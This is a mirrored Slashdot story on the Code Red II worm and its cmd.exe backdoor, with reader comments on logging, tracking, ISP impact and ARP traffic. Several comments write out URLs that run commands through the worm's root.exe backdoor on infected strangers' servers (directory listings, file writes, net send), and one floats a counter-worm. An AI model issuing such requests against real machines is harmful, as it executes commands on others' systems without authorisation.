Slashdot Mirror


Code Red II: Shells for the Taking

sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

602 comments

  1. Re:Apache users Create default.ida 5mb!!!! by beable · · Score: 2, Interesting

    How about if somebody writes a default.ida script which sends the attacking server a GET /default.ida which makes the server go to miscrosoft.com, download and install the patch, and reboot itself? That'd be neat.

    --
    ...
  2. Some Individual Forensics by VB · · Score: 1


    Are here.

    Frustrated by the lack of any current stats on this from DShield, or Incidents short of the update on the 4th, I collected some stats that might give some indication of where this thing is going. Peak times at 1300 and 1400 MST. Not sure what this means, but seems consistent.

    --
    www.dedserius.com
    VB != VisualBasic
  3. Re:This will put a bandaid on the problem: by Anonymous Coward · · Score: 0

    But doesn't the root.exe need to be marked non-executable? Or will changing its extension be enough?

    Thanks though.I added this to my script at cr_response_perlscript although I'd really prefer to stop the spread of the worm too...

  4. Re:White Hat Viruses? by Anonymous Coward · · Score: 0

    Max Vision of whitehats.org (IIRC) got busted for doing just this (writing a worm that patched systems to prevent a malicious worm from infecting them). The FBI didn't charge him with anything initially while he was ratting out people, but as soon as he baulked at ratting out a close friend, they fried his ass. Nice ethics those FBI thugs have. Article that explains it better is here at securityfocus.com.

  5. Re:Help track this: submit your logs to dshield! by mjh · · Score: 1

    Wow, that's excellent. Can you put up a pointer to your netcat config? I have one machine that is a webserver and it's pretty easy to track CR with it. But I'd like to be able to track on some of my other machines, and I see no reason for adding apache just to track this thing.

    TIA.

    --
    Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
  6. Oh god this is too much fun! by ZanshinWedge · · Score: 2

    I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor saps computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCK S!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".

    I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.

    1. Re:Oh god this is too much fun! by traphicone · · Score: 1
      How about something even more in your face:

      http://[ipaddy]/scripts/root.exe?/c+net+send+*+You +are+infected+with+the+Code+Red+II+worm.++Go+and+p atch+IIS+already!

  7. Re:Anyone still consider this a Microsoft problem? by Anonymous Coward · · Score: 0

    It was Max Vision. There is a nice article about it at securityfocus.

  8. Re:Origin of Code Red? by BalDown · · Score: 2, Funny

    Actually, yes it is based on Code Red Mountain Dew, and Pepsi evidentally didn't regard it as negative advertising, as last week they shipped over tons of cases of Code Red MD to the EEye team that named it.

    --
    You wasted packets to get this lousy sig.
  9. Re:this sucks by raju1kabir · · Score: 2
    with raw sockets, you can go into things that cant be done legally according to protocol, so now you can stuff round, triangular, and star shaped pegs through the square hole. things will break. its like trying to run a car on water, or trying to withdraw cash from an atm with the ace of spades.

    You need to put down the Gibson crack pipe and start speaking in real-world terms. Square pegs? Ace of spades? Random hallucinatory metaphors do not a persuasive argument make.

    Do you have an example of how malformed packets could be used to "take over" something? They're occasionally effective tools for DOS (though less and less as IP protocol handler authors stop making silly assumptions), and I do recall one FreeBSD ipfw vulnerability that hinged on the ability to set a certain flag in the packet header, but basically this is not such a big issue. All the fun and power is at higher levels - in the application layer.

    --
    "Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
  10. Re:The Breaking Point by nugatory · · Score: 3, Insightful
    So, which will it be, folks?

    None of the above.
    The two historical precedents that come to mind are:

    • The Grand Canyon midair collision on 30 June 1956
    • The sinking of the Titanic
    In both cases, technologies failed in ways that (in hindsight) were predictable and even inevitable consequences of growth beyond the their roots. In both cases, the response was moderate, incremental, and designed to preserve existing investments in these technologies. The lesson is that the "breaking point" for a widespread infrastructural technology is very hard to reach. And, like it or not, Windows is one of these technologies.

    Instead, what we'll see happen is more attention to security, taken in small steps. More people will subscribe to alert services, and they'll be willing to pay more for them. Bosses will start asking sysadmins what they've done for security today, and be more willing to sign purchase orders for security-related work. ISPs will pay a bit more attention to open ports on their home users, and some will scan their networks for known security vulnerabilities. OEMs configuring systems for naive users will discover that people will pay for a "safe out of the box" configuration, so they'll start to offer one. And so on, and so on....

    The normal state for an economically useful thing is to be stressed, but not stressed to the breaking point. This should be pretty obvious: if it's not stressed, it was uneconomically overbuilt. We are very far from the breaking point for Windows.

  11. Re:Not a bug by Anonymous Coward · · Score: 0

    windows has a telnet server. this fact draws any sliver of humor out of your attempted joke.

  12. Help track this: submit your logs to dshield! by mjh · · Score: 5, Informative
    You might want to consider submitting your apache logs to dshield. This will help keep track of the extent of this problem as well as help to analyze where it may have originated. If the dshield folks can correlate the earliest attacks of the latest variant, they have a chance at finding where this thing originated.

    Submissions can be made by following these instructions.

    --
    Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
    1. Re:Help track this: submit your logs to dshield! by Talla · · Score: 1

      The people who made this don't seem completely clueless, so I doubt there is much use. They will probably have listened for attacks from CR1, and only infected those. You may find them, and even the persons responsible for the servers, but considering the backdoor, it's unlikely there'll still be usable log files.

    2. Re:Help track this: submit your logs to dshield! by MS · · Score: 1
      You're an NT-Admin?
      And you have grep on your NT-box right?
      Not really!
      That's why NT-Admins always need 3rd party software, even for such basic tasks as extracting lines from a logfile for submitting them to DSHIELD.

      :-)
      ms
      --

    3. Re:Help track this: submit your logs to dshield! by Anonymous Coward · · Score: 0

      watch out you dont trip over your superiority complex

      UNIX - a bad idea 20 years ago a fucking nightmare now.

      BTW you just proved that you know NOTHING about NT and therefore invalidated your point completely - you dont need third party tools it is just that some of them make life easier - but then again i seriously fucking doubt you use grep all that much anymore anyway.

    4. Re:Help track this: submit your logs to dshield! by Telek · · Score: 1

      Yup, forgot the :) at the end. I just thought that the program name was rather ironic...

      --

      If God gave us curiosity
    5. Re:Help track this: submit your logs to dshield! by mutende · · Score: 1
      Too bad they don't take snort logs.

      Please let me quote from DShield's Linux Clients page:

      "If you are using Snort, download dshield_snort.pl. or the snort portscan format client: snort_portscan.pl"
      --
      Unselfish actions pay back better
    6. Re:Help track this: submit your logs to dshield! by Fishstick · · Score: 2

      >vunerabilities.org, a security scanning site, is listed in the top ten

      Also interesting is the statistic associated with this listing, 31526/2

      The first number is the number of "lines implicating this attacker", the second "number of targets attacked".

      Does this mean only two hosts reported an attack, but over 30,000 times?

      For comparison, 202.75.141.158 is now in first place with 97657/56947

      --

      There is much cruelty in the universe, John.
      Yeah, we seem to have the tour map.

    7. Re:Help track this: submit your logs to dshield! by mjh · · Score: 1
      I route all traffic coming in on port 80 to /dev/null just so snort can keep an eye on the attacks as they're coming in.

      I could be wrong, but I don't think you need to do this. Snort will track this independant of what your firewall is setup to do. Snort operates independant of the IP stack. It uses libpcap to sniff all packets that the interface receives. And if you configure snort to use promiscuous mode, then it'll even track attacks that aren't directed towards your machine.

      So I don't know for sure, but I don't think you need to route your port 80 packets anywhere. I think it'll track it just as long as it gets to your interface.

      --
      Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
    8. Re:Help track this: submit your logs to dshield! by MS · · Score: 1
      UNIX - a bad idea 20 years ago a fucking nightmare now.

      That may be true for you - I enjoy using Unix/Linux (I use it on several servers), while it is a nightmare for me administering NT-Boxes (Yes, I administer also an NT-Server)

      And yes, I use grep all the day for various tasks, in cronscripts, from command-line... and it is one of the most useful pieces of "UNIX" together with sed, awk and others. Maybe you have grep on your NT-box - I don't, or at least I didn't find it.

      But then, maybe you are kidding me and simply forgot to put a smiley there.

      ms

    9. Re:Help track this: submit your logs to dshield! by mjh · · Score: 1
      Snort will track this independant of what your firewall is setup to do

      Of course this assumes that snort is running on your firewall! If it isn't well then of course this won't work.

      --
      Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
    10. Re:Help track this: submit your logs to dshield! by LinuxHam · · Score: 4, Informative

      It uses libpcap to sniff all packets that the interface receives. And if you configure snort to use promiscuous mode, then it'll even track attacks that aren't directed towards your machine.

      I'm on 56k ppp dialup, so I shouldn't see any attacks (let alone packets) not destined for my machine. Now that you know that, you should also know that I was rejecting all connections to port 80 with ipchains. Therefore, since the worm couldn't connect, it wouldn't transmit the HTTP request that snort is watching for.

      By hanging netcat on port 80 with a 3 second connect limit using xinetd, all inbound port 80 probes get connections. They send their payload, snort alerts on it, netcat routes it directly to /dev/null, and then closes the connection. No huge apache logs, or whatever minimal risks are associated with apache.

      I shunt the payloads directly to /dev/null just so snort can actually watch them coming in. I literally asked for a "dummy listener" on the snort list, and they pointed me to netcat at l0pht.

      --
      Intelligent Life on Earth
    11. Re:Help track this: submit your logs to dshield! by LinuxHam · · Score: 1

      Too bad they don't take snort logs. I route all traffic coming in on port 80 to /dev/null just so snort can keep an eye on the attacks as they're coming in.

      --
      Intelligent Life on Earth
    12. Re:Help track this: submit your logs to dshield! by Anonymous Coward · · Score: 1, Interesting

      Does anyone else find it ironic that vunerabilities.org, a security scanning site, is listed in the top ten attackers on dshield.org? At least, it is listed as of 16:45 EDT.

    13. Re:Help track this: submit your logs to dshield! by siokaos · · Score: 1

      Yeah right! I'm sure they want a list of infected boxen so they know who they can root. Writing a program to follow millions of pathways back to one/a group of IPs is tedious, when you can use that same IP list for evil!

      --
      http://siokaos.org/
    14. Re:Help track this: submit your logs to dshield! by Telek · · Score: 1

      Why in god's name would I want to run a program called CODERED.EXE on my server?!

      --

      If God gave us curiosity
    15. Re:Help track this: submit your logs to dshield! by LeBleu · · Score: 1

      Take a look at http://www.dshield.org/howto.html, it says how to submit snort logs.

      --
      --LeBleu

      If you're reading this you're part of the mass hallucination that is Kevin the Blue.

  13. Re:Listen Code Red * authors! by Unknown+Bovine+Group · · Score: 1
    Why don' t you add a checking to stay away from Apache servers?! The worm would be more difficult to trace without all those access.log evidence....

    <SarcasticBitchslap>Yeah, since Apache is the only web server that logs access. </SarcasticBitchslap>

    --
    m00.
  14. Re:Origin of Code Red? by Fishstick · · Score: 2
    >My first guess was Coca-Cola

    A Pepsi product (mountain dew), actually

    crack the code

    Tastes like cough syrup but has a pretty good kick (hate to think about what that much red food color does to your internal organs though).

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  15. Bandwidth by nick_davison · · Score: 4, Insightful
    But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

    I kind of find myself wondering, which wastes more bandwidth: the virus itself of all of the discussion about the virus?

    I'm assuming the virus wastes vastly more. That said, take a look at the way every news site is covering it, the large images they have accompanying the stories and the vast numbers of people reading them because MSN messenger tells them it's important. I don't know if there is any way of measuring the bandwidth wasted by each but it'd be an interesting ratio to see, if there was.

    1. Re:Bandwidth by zexxxx · · Score: 1
      which wastes more bandwidth: the virus itself or all of the discussion about the virus?

      The virus is to blame for it all. The discussion is about the virus. No virus, no discussion.

    2. Re:Bandwidth by driehuis · · Score: 2
      I'm assuming the virus wastes vastly more.

      Speaking from the bowels of corporate hell, I can assure anyone that the bandwidth issues are as to nothing compared to the manpower invested.

      I've applied the C2 security fixes to out IIS server (they're secret, don't ask me about details or I'd have to bury you). But still, the bleeding thing kept attacking our Apache and Netscrape servers, and you don't want to know the pain and suffering of explaining the risks to the end users...

      --

      Bert Driehuis -- All I asked was a friggin' rotatin' chair. Throw me a bone here, people.

    3. Re:Bandwidth by TrixX · · Score: 4, Insightful

      The bandwidth wasted by the virus is actually wasted, and useless.

      But if all the news, the discussion and similar are useful to make sysadmins a little smarter and make them use less vulnerable servers, or at least keep security patches up to date, I think that is not "waste".

  16. Re:Ummm, no actuall by Carnivore · · Score: 1

    Unfortunately, many shellfish become very toxic if they are dead and uncooked. Maryland Blue Crabs are a classic example--they are always cooked live.
    I would also argue that your average sadist wouldn't get a whole lot out of it because crabs and lobsters really aren't that bright. The pleasure of sadism comes out of the mental domination of the other party. Generally, an intelligent creature is required. (this is all from a college psycology class years ago)

  17. Re:Ummm, no actuall by Anonymous Coward · · Score: 0

    Mushrooms aren't plants, they're fungi.

  18. Killing small ISPs by Alien54 · · Score: 5, Informative
    I know of at least one small ISP that had very serious problems this week.

    First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.

    Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.

    BOOM!

    If this keeps happening, this is going to be bad for business in a lot of places.

    --
    "It is a greater offense to steal men's labor, than their clothes"
    1. Re:Killing small ISPs by cybersmith · · Score: 1

      Code Red, Sircam... they are just the tip of the iceberg. Can you imagine what would happen if a virus similar to Code Red were infecting windows 95/98/Me boxes instead of those running NT/2000 with IIS. ISP's and other corporations need to seriously look at installing filters such as the procmail sanitizer. I have installed this on several system's and it catches over 150 viruses a day, and notifies those infected on how to remove the virus from their system. It's only a matter of time until the Next Code Red hits... one that isn't so easily tracked and acts with a lot more malice (ie. random smurfing/flooding, reg eating, changing number's in excell doc's, reformating outgoing e-mail, posting personal information to usenet, ect.)

    2. Re:Killing small ISPs by Anonymous Coward · · Score: 0

      Why stop there? I'm willing to bet that a good, old-fashioned DOS box is more secure than even Win9x. :)

    3. Re:Killing small ISPs by slamb · · Score: 2

      I know of at least one small ISP that had very serious problems this week. First one of the top dogs in the place sent sircam throughout the company

      I have absolutely no sympathy for them. It's maybe understandable when someone from completely outside a computer-related field propogates a virus like that. But anyone at an ISP should know better. I don't care if they are in a non-technical position there; they still should have a basic understanding of what their company does. And the most basic understanding is all you need to not be infected.

    4. Re:Killing small ISPs by Anonymous Coward · · Score: 0

      It is pretty hard to infect win95/98 boxes with anything, because usually they are not running any services. Some do run netbios, and that is a hole, but if you are competent, don't open email viruses, run IE with javascript, and activeX off, then a win95/98 box is more secure than most unix boxes. And no I am not joking.

    5. Re:Killing small ISPs by thrig · · Score: 1

      Translation: using Microsoft is bad for business.

    6. Re:Killing small ISPs by Mike+Schiraldi · · Score: 2

      Watch out, "Microsoft Worm" looks awfully similar to the name of a popular word processing application... If you thought you could get in trouble with the feds for writing and releasing a worm, wait till you see what Microsoft's trademark attorneys will do to you.

    7. Re:Killing small ISPs by Anonymous Coward · · Score: 0

      > I know of at least one small ISP that had very serious problems this week.

      If that ISP is not using linux/freebsd, then they get what they asked for.

      > If this keeps happening, this is going to be bad for business in a lot of places.

      This is called darwinisn. Most of us think that it is a good thing.

      Cheers,

      --fred

    8. Re:Killing small ISPs by sirPaul · · Score: 2, Interesting
      --


      -pB
    9. Re:Killing small ISPs by ethereal · · Score: 1

      It's about time people figured out that Microsoft is bad for business :)

      --

      Your right to not believe: Americans United for Separation of Church and

    10. Re:Killing small ISPs by Anonymous Coward · · Score: 0

      If that ISP is not using linux/freebsd, then they get what they asked for.

      The ISP could still be having problems even if they are using Linux/FreeBSD! If there are enough /index.ida requests to fill up all of thier bandwidth, then it becomes a large problem!

    11. Re:Killing small ISPs by Velox_SwiftFox · · Score: 2
      You run port 80 requests through procmail? Code Red doesn't spread though email, you know.

      In any case, since Microsoft doesn't insall it easily, too few Win9x/Me boxes are running Personal Web Server. I don't think it even includes the vulnerable Index Server component.

    12. Re:Killing small ISPs by Chilles · · Score: 2

      I must disagree with you on this point.
      Yes they should know better, and yes, they probably didn't keep their servers entirely up to date with the latest security updates, but nothing would have happened if nobody had written this worm.
      Next thing the police tells me I'm to blame for the latest break in in my house because my door wasn't patched against the latest models crowbar.
      They just suffered a lot of damage because some jerk somewhere lacks a decent moral and ethical education.

    13. Re:Killing small ISPs by dizco · · Score: 1

      The police won't tell you that, but if you discover that your front door's lock has become ineffective, and you fail to fix it, i'll certainly call you a moron.

      --sean

    14. Re:Killing small ISPs by slamb · · Score: 1, Flamebait

      Yes they should know better [...] but nothing would have happened if nobody had written this worm.

      I agree absolutely; the writers of these worms deliberately caused a lot of people a lot of stress. There's no excuse for that. They're bastards. But that doesn't change the fact that the people at this ISP would have had no problem if they were competent at their jobs. It's their job to know how to deal with computers; they apparently do not. It's hard for me to be sympathetic.

      and yes, they probably didn't keep their servers entirely up to date with the latest security updates

      I was talking about the SirCam worm in particular here the one that you need to actually run yourself to get infected with. Missing a security patch is more understandable to me, although ideally people would be vigilant as well as running software that doesn't need to be patched so often.

      Next thing the police tells me I'm to blame for the latest break in in my house because my door wasn't patched against the latest models crowbar.

      Not to blame, but it's much easier for me to have sympathy for someone who's stuff is stolen despite good common sense than for someone who doesn't even lock the door when (s)he goes on vacation.

      They just suffered a lot of damage because some jerk somewhere lacks a decent moral and ethical education.

      and because they weren't at all cautious. There are plenty of people who had absolutely no problem with SirCam because they were smart enough not to open and run double-named attachments sent to them by a near-illiterate masquerading as someone they may vaguely know (the email addresses it gives aren't necessarily at all close acquaintances). I just don't understand how people in the computer industry could fall victim to SirCam.

    15. Re:Killing small ISPs by Dmitry+Skylarov · · Score: 0
      Fred,

      Your posts are usually very interesting and insightful. But not today.

      If that ISP is not using linux/freebsd, then they get what they asked for.

      I'm running UNIX. Not Linux, and not FreeBSD. UNIX. Therefore, not only does this worm not affect me, but I have better uptime and godlike hardware.

      The point is that Linux and FreeBSD aren't the answer. The answer is, stop using Windows. As long as your switch to something -- whatever that something may be -- it's an improvement. Today, you have a choice of over five flavors of UNIX, several BSD4.4-based free Unix-workalikes, and many GNU/Linux distrubutions. As well as MacOS, MacOS X, VMS, OS/390, Plan 9, and Amiga.

      Don't whistle while you're pissing, and don't try to be an Open Source zealot whilst bashing Microsoft. If you think that either Linux (which doesn't scale well on Real Computers, and is just a bit unprofessional) or FreeBSD (poor Java support, no commercial software, homosexual core team) are perfect solutions for every situation, then you are just as ignorant as Rob Malda.

      Thank you.

      This is called darwinisn. Most of us think that it is a good thing.
      Unfortunately, the computer industry is more forgiving than nature. At this very moment, I am writing a paper than describes how Netscape (and iPlanet, for that matter) would be a dead company if Darwinism could be applied to the Internet.
      --

      ----
      Please, I are begging you! To save Dmitry from teh jail!

    16. Re:Killing small ISPs by Anonymous Coward · · Score: 0

      Only the ones that have severe problems in the first place - if you're a small ISP running MS software you've shot yourself in the foot anyway. Buggy code, extreme hardware requirements, incredibly expensive code - that's hardly going to contribute in a positive way to your cash flow.

      On the other hand if you're running an ISP using inexpensive, reliable boxes and low-cost reliable software you've saved yourself quite a bit of cash and headaches.

    17. Re:Killing small ISPs by Anonymous Coward · · Score: 0

      > > If that ISP is not using linux/freebsd, then they get what they asked for.

      > I'm running UNIX. Not Linux, and not FreeBSD. UNIX. Therefore, not only does this worm not affect me, but I have better uptime and godlike hardware.

      Funny that you point that. I first wrote 'If that ISP is running Windows' then changed to freebsd to annoy the linux-lovers. Then added linux as the point was to annoy Windows users. I take the blame.

      > FreeBSD (poor Java support, no commercial software, homosexual core team)

      Yeah. And the HURD will probably not be an improvement here.

      Btw, aren't you supposed to be in jail(8) ?

      Cheers,

      --fred

    18. Re:Killing small ISPs by cybersmith · · Score: 1

      I'm just saying that worms are here to stay, no matter what form or shape they use to spread. (e-mail or via exploits) So we need to protect users from themselves.

  19. Re:huge cable modem hits by lqx · · Score: 1
    Optus@Home which is the sole @home provider in Australia is already doing this. They are blocking all incoming port 80 traffic from outside their subnet. However, I'm still getting numerous attempts in my ipchains log.

    The matter of fact is that at least this has shielded most of the users from external infections, but pointless when u still have users within subnet infecting each other over and over again :)

  20. Re:213.77.4.237 has been attacking me and by Lord+Azrael · · Score: 1

    shall we all now post IP adresses of victims? This is senseless. I do get about 5 entries per 10 seconds in my logfile from thousands of different servers. reverse lookups show many victims on cable oder dsl modems (@home) and just 30% of all ip's are real webservers. so at least all dialup victims can't be informed and my mails to the others where a reverse lookup reveladed who is running that to the postmaster or webmaster came back. its unbelievable, i have 70 websites running on my box and still i do get more code read calls than for normal webpages. thank good its linux.

    --
    Lord "not Gargamel's Cat!" Azrael
  21. Sue Microsoft - its time for class action by Anonymous Coward · · Score: 1, Interesting

    I'm surprised that Microsoft has escaped a huge class-action lawsuit for all the damage their products have piled upon their users and non-microsoft users. Its about time that somebody takes this on. I live in a Unix world but I'm tired of all the problems Gates and co. cause me.

  22. Re:Hypothetical question by Anonymous Coward · · Score: 0

    If accessed from the telnet method, the trojan runs with the same privelages as IIS... as a system service which is admin privs.

  23. Re:The Whitehouse.gov lesson by fanatic · · Score: 2

    Actually, they moved it to akamai, a large network of servers distributed across the internet. Requests are spread out over several servers, thereby making the site as a whole more resistant to DDOS. (They just happen to be Linux). Microsoft did the same thing with their DNS servers after these were DDOS'd earlier this year. A network like Akamai may be the only real defense against a good DDOS (syn flood, spoofed IPs) that doesn't involve ignoring some lgeitimate requests as well as the trash.

    --
    "that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
  24. Re:Why do people still use Outlook? by arielb · · Score: 1

    what did she think it was? Iced coffee? Of course you'll burn yourself if you spill coffee on your lap. That's why you should be careful! WHat's next? Suing tea kettle companies if you are such a klutz that you spilled boiling water all over yourself?

    --
    ---
  25. Re:Apache users Create default.ida 5mb!!!! by ichimunki · · Score: 1

    Yuck! How about if it just deinstalls IIS altogether and sends an email to root (or whatever it's called on NT) explaining that they have forfeited their right to host web services since they can't be bothered to secure them with known patches for worms that are making headlines in non-tech journals even? And considering that .ida sounds like something that should be turned OFF by default and certainly should NOT include a default.ida page (which I'm guessing some "thoughtful" developer included to prevent 404 errors in the default install/demo install), they might consider finding server software that comes preconfigured to be a little more sensible than that.

    --
    I do not have a signature
  26. Re:Code Red Infects Slashdot! by thrig · · Score: 1

    I braved the evil frames of the securityfocus website to bring you:

    http://www.securityfocus.com/archive/1/198282

  27. Re:Ummm, no actuall by Unknown+Bovine+Group · · Score: 1
    I don't care what anyone says, cooking an animal alive is just fucking sadistic.

    Or as Homer would say, "MMmmmm, sadisti-licious!"

    --
    m00.
  28. Re:The Whitehouse.gov lesson by Anonymous Coward · · Score: 0
    People should really stop and think before they post sometimes.

    This is slashdot. Why do you think they are called slashbots?

  29. Re:It is the time by Anonymous Coward · · Score: 0

    couldn't you just use: http://infectedhost/scripts/root.exe?/c+net+send+A dministrator+"Please%20patch%20your%20IIS%20agains t%20Code%20Red"

  30. Patch here by Anonymous Coward · · Score: 0

    telnet www.microsoft.com 80

  31. Re:huge cable modem hits by Aexion · · Score: 1

    I'm a dsl customer and I'm also seeing a lot of attempts to spread the code red I and II worms. After noticing that my dsl modem was flickering constantly even after powering down all of my connected computers I became curious and fired up nuke nabber which displayed the signature for the code red worm coming in on port 80. I watched for a while and also noticed that the activity lights on my dsl modem were flickering much more frequently than any requests being reported by nuke nabber. I then installed a packet sniffer so I could take a closer look at what was going on. Here's where I get in over my head...

    I see constant ARP broadcasts with MAC addresses. I don't really know much about this and am not sure how to interpret what's going on. Can anyone suggest some good resources that might help me decypher this traffic? I wondered if it was perhaps my service provider broadcasting the DHCP address (I'm sure my ignorance of this subject matter is now glaring...) but from my research on how DHCP works I don't think this is what's happening. Any suggested references or information would be greatly appreciated.

    Thanks,

    Aexion

  32. Re:File download script by Anonymous Coward · · Score: 0

    All this talk about 'helping' the infected systems reminds me of Greg Bear's Forge of God where all those little spider robots help the poor humans who's planet is infected by the planet killers. ...965 hits on my Apache so far...

  33. Re:Why do people still use Outlook? by Tuonenkielo · · Score: 1

    The McDonals coffee case judge was not braindead. get teh facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature. Not that having some judgement like that against MicroSoft wouldn't be nice. Of course, it might not help much in getting MS to clean up their act.

  34. Re:Code Red Infects Slashdot! by berenddeboer · · Score: 1

    > It is on or near this day that Microsoft's > software became, without a doubt, a public > nuisance to the internet. I've not seen anyone mentioned the underlying causes for buffero verflows. There are two: 1. The C language, written for programmer gods. Unfortunately, MS hasn't one. If they had used Pascal (Eiffel/Ada/...) and had range checking on, they would have been safe. 2. The Intel processor that let's code on the stack to be executable. Without these two, the Internet would have been a lot safer. And it would have safed lots of security code reviews too. Groetjes, Berend. (-:

    --
    If I had a sig, I would put it here.
  35. Re:huge cable modem hits by jackb_guppy · · Score: 1

    Not completily true.

    @home at home, it is true no public servers.

    But a business connection can...

    I have High School in Kansas, a pair or cops in Ohio just banging away. Firewall is eating them all. I have many more that it looks like AT$T have taken off the air.

  36. Code Red II (or III) on cable modem segments by possible · · Score: 2, Interesting
    I posted this to Bugtraq last night but it got rejected. :P

    Anyways, if cable modem users are seeing drastically increased ARPing, the targeting of the Code Red III variant should explain it -- hitting non-existent addresses on your subnet will cause the CMTSheadend router to ARP out to see who's got that address, you get the picture.

    At the very least, it's a good opportunity for users to see how many modems your provider has packed onto your segment. If they've packed too many on there, you can be sure the CMTS router's going to get seriously bogged down.

    I have an automated program which sends the IP addresses to the ARIS list *and* to my ISP's security department (those IP's which fall under their management) -- I wonder if ISP's are considering just dropping all packets from infected hosts, so when the customer comes to them and complains, they say "Oh, you're infected, reboot, install the patch, and we'll reconnect you." Seems that this would reduce the load on the CMTS and would be faster than trying to track down each customer individually.

    Chad Loder

    Rapid 7, Inc. - Next generation security products and services

    http://www.rapid7.com

    1. Re:Code Red II (or III) on cable modem segments by Anonymous Coward · · Score: 0
      No kidding. My cable modem light has been flashing non-stop. I was suspicious and thought something was slurping something from my machine (which would be bad, since I don't run any servers.

      Turned out that I'm getting tons of ARP requests! Hundreds per minute.

    2. Re:Code Red II (or III) on cable modem segments by myz24 · · Score: 1

      I know I have on our cableone network. I'm seeing up to 5.8k bytes per second of arp traffic. And considering how busy Sundays are I'm thinking the traffic will increase. I have pictures of the amount of traffic I'm getting at this place. I'm using iptraf and gkrellm.

    3. Re:Code Red II (or III) on cable modem segments by rjamestaylor · · Score: 2

      Same thing here - sample tcpdump on eth0:

      tcpdump: listening on eth0
      19:14:07.770553 B arp who-has 66.74.1.213 tell 66.74.0.1
      19:14:08.020553 B arp who-has 66.74.1.184 tell 66.74.0.1
      19:14:08.580553 B arp who-has 66.74.1.112 tell 66.74.0.1
      19:14:08.910553 B arp who-has 66.74.1.226 tell 66.74.0.1
      19:14:09.180553 B arp who-has 66.74.1.158 tell 66.74.0.1
      19:14:09.320553 B arp who-has 66.74.1.8 tell 66.74.0.1
      19:14:09.500553 B arp who-has 66.74.1.159 tell 66.74.0.1
      19:14:09.570553 B arp who-has 66.74.1.252 tell 66.74.0.1
      19:14:09.700553 B arp who-has 66.74.1.116 tell 66.74.0.1
      19:14:09.890553 B arp who-has 66.74.1.253 tell 66.74.0.1
      19:14:10.000553 B arp who-has 66.74.1.183 tell 66.74.0.1
      19:14:10.220553 B arp who-has 66.74.1.108 tell 66.74.0.1
      19:14:10.290553 B arp who-has 66.74.1.192 tell 66.74.0.1
      19:14:10.380553 B arp who-has 66.74.1.147 tell 66.74.0.1
      19:14:10.840553 B arp who-has 66.74.1.113 tell 66.74.0.1
      19:14:10.950553 B arp who-has 66.74.1.71 tell 66.74.0.1
      19:14:11.630553 B arp who-has 66.74.1.237 tell 66.74.0.1
      19:14:11.800553 B arp who-has 66.74.0.127 tell 66.74.0.1
      19:14:11.800553 B arp who-has 66.74.1.181 tell 66.74.0.1
      19:14:11.880553 B arp who-has 66.74.1.226 tell 66.74.0.1
      19:14:12.260553 B arp who-has 66.74.1.18 tell 66.74.0.1
      19:14:12.270553 B arp who-has 66.74.1.8 tell 66.74.0.1
      19:14:12.280553 B arp who-has 66.74.1.98 tell 66.74.0.1
      19:14:12.360553 B arp who-has 66.74.1.146 tell 66.74.0.1
      19:14:12.980553 B arp who-has 66.74.1.122 tell 66.74.0.1
      19:14:13.070553 B arp who-has 66.74.1.132 tell 66.74.0.1
      19:14:13.140553 B arp who-has 66.74.1.108 tell 66.74.0.1
      19:14:13.300553 B arp who-has 66.74.1.192 tell 66.74.0.1
      19:14:13.330553 B arp who-has 66.74.1.208 tell 66.74.0.1
      19:14:13.590553 B arp who-has 66.74.1.126 tell 66.74.0.1
      19:14:13.730553 B arp who-has 66.74.1.145 tell 66.74.0.1
      19:14:13.800553 B arp who-has 66.74.1.113 tell 66.74.0.1
      19:14:13.910553 B arp who-has 66.74.1.71 tell 66.74.0.1
      19:14:14.690553 B arp who-has 10.74.0.180 tell 10.74.0.1
      19:14:14.770553 B arp who-has 66.74.1.181 tell 66.74.0.1
      19:14:15.250553 B arp who-has 66.74.1.98 tell 66.74.0.1
      19:14:15.320553 B arp who-has 66.74.1.146 tell 66.74.0.1
      19:14:15.320553 B arp who-has 66.74.1.159 tell 66.74.0.1
      19:14:15.610553 B arp who-has 66.74.1.231 tell 66.74.0.1
      19:14:15.910553 B arp who-has 66.74.1.253 tell 66.74.0.1
      19:14:16.060553 B arp who-has 66.74.1.189 tell 66.74.0.1
      19:14:16.060553 B arp who-has 66.74.1.132 tell 66.74.0.1
      19:14:16.400553 B arp who-has 66.74.1.41 tell 66.74.0.1
      19:14:16.590553 B arp who-has 66.74.1.125 tell 66.74.0.1
      19:14:16.610553 B arp who-has 66.74.1.126 tell 66.74.0.1
      19:14:16.680553 B arp who-has 66.74.1.145 tell 66.74.0.1
      19:14:17.060553 B arp who-has 66.74.1.169 tell 66.74.0.1
      19:14:17.130553 B arp who-has 66.74.1.79 tell 66.74.0.1
      19:14:17.280553 B arp who-has 66.74.1.35 tell 66.74.0.1
      19:14:17.540553 B arp who-has 66.74.1.254 tell 66.74.0.1
      19:14:17.910553 B arp who-has 66.74.1.226 tell 66.74.0.1
      19:14:18.040553 B arp who-has 66.74.1.223 tell 66.74.0.1
      19:14:18.230553 B arp who-has 66.74.1.8 tell 66.74.0.1
